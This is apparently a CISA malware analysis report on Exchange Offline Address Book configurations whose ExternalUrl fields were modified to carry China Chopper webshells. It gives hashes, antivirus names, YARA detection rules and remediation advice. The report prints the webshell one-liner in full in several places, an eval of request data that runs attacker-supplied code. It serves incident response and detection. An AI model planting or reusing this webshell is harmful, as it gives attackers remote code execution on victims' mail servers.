Analysis Report

MAR-10329301-1.v1: China Chopper Webshell

Last Revised
Alert Code
AR21-072F

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

For a downloadable copy of IOCs, see: MAR-10329301-1.v1.stix.

Summary

Description

CISA received three unique files for analysis. These files appear to contain configuration data for Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD) extracted from a Microsoft Exchange Server. The three output files show malicious modifications for the ExternalUrl parameters. In two of the OAB VDs, the ExternalUrl parameter contains a "China Chopper" webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server.

Submitted Files (3)

5ac7dec465b3a532d401afe83f40d336ffc599643501a40d95aa886c436bfc0f (web.config.aspx)

5e09ea8b70a386f0812a8cafb94e2d2365849ce67fda42377389f18e56d860d0 (supp0rt.aspx)

c7e1b386b472a26a36632f4ccc25e37458546b9c864b7ef0ec5ebece5e8cc704 (uHSPTWMG.aspx)

Findings

5ac7dec465b3a532d401afe83f40d336ffc599643501a40d95aa886c436bfc0f

Tags

backdoortrojanwebshell

Details
Name web.config.aspx
Size 2241 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 742b340f8739e73d9347d68e7ffc1590
SHA1 fc5e612238d4217b10ba2c6701f487d1346f8338
SHA256 5ac7dec465b3a532d401afe83f40d336ffc599643501a40d95aa886c436bfc0f
SHA512 9893f5c6e204b8188bf2e6670d590abdd0f7bba403d4b641f87ee59d037ee0c692d591f3eba10bd6c1142003a246964036465b1f813eaa1d5fc8aaf75628994c
ssdeep 24:kNrde9gvxL+rJTh91QGBORNXd56j0SzMa1VMr6j71idfhnohdxpTYFs2E4ONF0qe:kNrdeEC1BfGw0xM5QZohdf6q4ONF0qe
Entropy 4.700805
Antivirus
Ahnlab Exploit/ASP.Cve-2021-27065.S1406
Avira EXP/CVE-2021-27065.1
BitDefender Generic.ASP.WebShell.H.FFDD4FC5
ClamAV Asp.Trojan.Webshell0321-9840176-0
Emsisoft Generic.ASP.WebShell.H.FFDD4FC5 (B)
Ikarus Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.FFDD4FC5
McAfee Exploit-CVE2021-27065.a
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-O
Symantec Trojan.Chinchop
TrendMicro Backdoo.DDEA7357
TrendMicro House Call Backdoo.DDEA7357
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Webshellz"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Exchange OAB VD MOD"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised Microsoft Exchange Server. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will directly be executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD containing JavaScript code that will be executed on the target system.



In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:



--Begin webshell--

http[:]//f/<script language="JScript" runat="server">function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item["22cddb421b13c90130b2b2bddedeb360"])),"unsafe");}</script>

--End webshell--



The code within the file decodes and executes data using the JavaScript “eval” function. The requested encoded data was not available for analysis.



Displayed are the contents of the configuration:



--Begin configuration--

Server                         : [REDACTED]

WhenChanged                     : 3/5/2021 7:55:08 AM

InternalUrl                     : hxxps[:]//REDACTED].local/OAB

ExternalUrl                     : hxxp[:]//f/<script language="JScript" runat="server">function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item["22cddb421b13c90130b2b2bddedeb360"])),"unsafe");}</script>

Identity                        : [REDACTED\OAB (Default Web Site)

PollInterval                    : 480

Name                            : OAB (Default Web Site)

AdminDisplayVersion             : Version 15.2 (Build 659.4)

OfflineAddressBooks             :

RequireSSL                     : True

BasicAuthentication             : False

WindowsAuthentication         : True

OAuthAuthentication             : False

MetabasePath                    : IIS[:]//[REDACTED].local/W3SVC/1/ROOT/OAB

Path                            : E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB

ExtendedProtectionTokenChecking : None

ExtendedProtectionFlags         :

ExtendedProtectionSPNList     :

InternalAuthenticationMethods : WindowsIntegrated

ExternalAuthenticationMethods : WindowsIntegrated

AdminDisplayName                :

ExchangeVersion                 : 0.10 (14.0.100.0)

DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED],CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=[REDACTED],DC=local

Guid                            : 2604a1e4-17af-4f27-9a43-0c9f877ab1fa

ObjectCategory                 : [REDACTED].local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory

ObjectClass                     : top

                                msExchVirtualDirectory

                                msExchOABVirtualDirectory

WhenCreated                     : 3/4/2021 11:29:50 AM

WhenChangedUTC                 : 3/5/2021 12:55:08 PM

WhenCreatedUTC                 : 3/4/2021 4:29:50 PM

OrganizationId                 :

Id                             : [REDACTED]\OAB (Default Web Site)

OriginatingServer             : [REDACTED]-dc1.[REDACTED].local

IsValid                         : True

--End configuration--

c7e1b386b472a26a36632f4ccc25e37458546b9c864b7ef0ec5ebece5e8cc704

Tags

backdoor

Details
Name uHSPTWMG.aspx
Size 2226 bytes
Type ASCII text, with CRLF line terminators
MD5 f04aa369ceee2d1388f9453d0d9758df
SHA1 888d1a0e10222a80c8076728d16eb10072b1473b
SHA256 c7e1b386b472a26a36632f4ccc25e37458546b9c864b7ef0ec5ebece5e8cc704
SHA512 4dd200a585fe93f2f8f102fd0359c4290d4b516ce5ec6a8b304ded61bf3a332d5c81272cada303109a366c42fa38956387e33b7309fcbf3ef6dbf7a27cf0a10e
ssdeep 24:kNrdjgvxL+rJTh91QGBORNmfB68U6Q68UB1idfhnohdxyAFs2E4ONF0qf9H2:kNrdaC1BfGt67PQZohdsWq4ONF0qk
Entropy 4.526671
Antivirus
Sophos Troj/ASPDoor-W
YARA Rules
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Exchange OAB VD MOD"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised system. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell, which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



--Begin webshell--

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load(){eval(Request["[REDACTED]"],"unsafe");}</script>

--End webshell--



he hard-coded key used for authentication was redacted from the code above.



This file contains the following configuration data (sensitive data was redacted):



--Begin configuration--

Name                            : OAB (Default Web Site)

PollInterval                    : 480

OfflineAddressBooks             :

RequireSSL                     : True

BasicAuthentication             : False

WindowsAuthentication         : True

OAuthAuthentication             : False

MetabasePath                    : IIS[:]//[REDACTED].local/W3SVC/1/ROOT/OAB

Path                            : E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB

ExtendedProtectionTokenChecking : None

ExtendedProtectionFlags         :

ExtendedProtectionSPNList     :

AdminDisplayVersion             : Version 15.2 (Build 659.4)

Server                         : [REDACTED]

InternalUrl                     : hxxps://[REDACTED].local/OAB

InternalAuthenticationMethods : WindowsIntegrated

ExternalUrl                     : hxxp[:]//f/<script language="JScript" runat="server">function Page_Load(){eval(Request["[REDACTED"],"unsafe");}</script>

ExternalAuthenticationMethods : WindowsIntegrated

AdminDisplayName                :

ExchangeVersion                 : 0.10 (14.0.100.0)

DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED],CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=[REDACTED],DC=local

Identity                        : MCKEX2019\OAB (Default Web Site)

Guid                            : 2ffb2ea7-36b9-4ed4-9ea9-3bfa75d67947

ObjectCategory                 : [REDACTED].local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory

ObjectClass                     : top

                                msExchVirtualDirectory

                                msExchOABVirtualDirectory

WhenChanged                     : 3/4/2021 11:29:42 AM

WhenCreated                     : 3/3/2021 10:35:01 AM

WhenChangedUTC                 : 3/4/2021 4:29:42 PM

WhenCreatedUTC                 : 3/3/2021 3:35:01 PM

OrganizationId                 :

Id                             : MCKEX2019\OAB (Default Web Site)

OriginatingServer             : [REDACTED]-dc1.[REDACTED].local

IsValid                         : True

--End configuration--

5e09ea8b70a386f0812a8cafb94e2d2365849ce67fda42377389f18e56d860d0

Tags

backdoortrojanwebshell

Details
Name supp0rt.aspx
Size 2328 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 b5aff5be558e41243225a3e2480fc8dc
SHA1 4bc72b82af2f455eb69e582793593db8fb03c7da
SHA256 5e09ea8b70a386f0812a8cafb94e2d2365849ce67fda42377389f18e56d860d0
SHA512 68f92197cc11748e88aa18012bdfa910e30bc2bd605ad6fe5291f3f87b5cd00f65d201b41945d9dea392f526eb5736ef5fff2d7628b7859665d01743d4eadb58
ssdeep 48:1vEsFkLavMfmrdeEC1z95QZohdoTq4ONF0qt:1vEsWLgEydeb7zNCqt
Entropy 4.763355
Antivirus
Avira EXP/CVE-2021-27065.1
BitDefender Generic.ASP.WebShell.I.C2BB8C94
ClamAV Asp.Trojan.Webshell0321-9840173-0
Emsisoft Generic.ASP.WebShell.I.C2BB8C94 (B)
Ikarus Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.I.C2BB8C94
Microsoft Security Essentials Backdoor:ASP/Chopper.M!dha
Quick Heal CVE-2021-26855.Webshll.41381
Sophos Troj/WebShel-O
Symantec Trojan.Chinchop
TrendMicro Backdoo.DDEA7357
TrendMicro House Call Backdoo.DDEA7357
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Webshellz"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Exchange OAB VD MOD"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This is file is an OAB configuration file. The configuration contains a key in the "ExternalUrl" field used for authentication. No webshell was observed in this configuration at the time of analysis.



This file contains the following configuration data (sensitive data was redacted):



--Begin configuration--

Name                            : OAB (Default Web Site)

PollInterval                    : 480

OfflineAddressBooks             :

RequireSSL                     : True

BasicAuthentication             : False

WindowsAuthentication         : True

OAuthAuthentication             : True

MetabasePath                    : IIS[:]//[REDACTED].local/W3SVC/1/ROOT/OAB

Path                            : E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB

ExtendedProtectionTokenChecking : None

ExtendedProtectionFlags         :

ExtendedProtectionSPNList     :

AdminDisplayVersion             : Version 15.2 (Build 659.4)

Server                         : MCKEX2019

InternalUrl                     : hxxps[:]//mail.[REDACTED].org/OAB

InternalAuthenticationMethods : OAuth

                                WindowsIntegrated

ExternalUrl                     : hxxp[:]//f/[REDACTED]

ExternalAuthenticationMethods : OAuth

                                WindowsIntegrated

AdminDisplayName                :

ExchangeVersion                 : 0.10 (14.0.100.0)

DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED],CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=[REDACTED],DC=local

Identity                        : [REDACTED]\OAB (Default Web Site)

Guid                            : 5ca610e7-d5d9-4eaa-8625-76ec5e0ec867

ObjectCategory                 : [REDACTED].local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory

ObjectClass                     : top

                                msExchVirtualDirectory

                                msExchOABVirtualDirectory

WhenChanged                     : 2/27/2021 6:47:53 PM

WhenCreated                     : 6/16/2020 4:57:54 PM

WhenChangedUTC                 : 2/27/2021 11:47:53 PM

WhenCreatedUTC                 : 6/16/2020 8:57:54 PM

OrganizationId                 :

Id                             : [REDACTED]\OAB (Default Web Site)

OriginatingServer             : [REDACTED]-dc1.[REDACTED].local

IsValid                         : True

--End configuration--

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Central.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

March 13, 2021: Initial Version|March 25, 2021: New YARA rule added

This product is provided subject to this Notification and this Privacy & Use policy.